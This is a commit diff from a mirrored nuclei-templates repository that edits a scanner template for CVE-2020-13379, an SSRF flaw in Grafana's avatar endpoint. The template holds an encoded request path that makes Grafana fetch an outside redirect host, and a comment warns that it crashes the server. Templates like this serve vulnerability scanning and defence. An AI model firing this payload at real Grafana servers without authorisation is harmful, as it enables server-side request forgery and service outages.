daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2020-13379.yaml

patch-1
joeldeleep 2020-09-27 12:44:17 +05:30 committed by GitHub
parent f83e33f78f
commit aa50c7370d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
cves/CVE-2020-13379.yaml
View File

@ -5,7 +5,7 @@ info:
author: pxmme1337
severity: medium
description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client.
# Source:- https://www.exploit-db.com/exploits/48638
# WARNING
# This vulnerability results in complete crashing of the grafana-server application.
@ -15,10 +15,7 @@ requests:
path:
- '{{BaseURL}}/avatar/test%3fd%3dredirect.example.com%25253f%253b%252fbp.blogspot.com%252f
matchers:
- type: status
status:
- 200
- type: word
words:
- "image/jpeg"
part: header
words:
- "image/jpeg"
part: header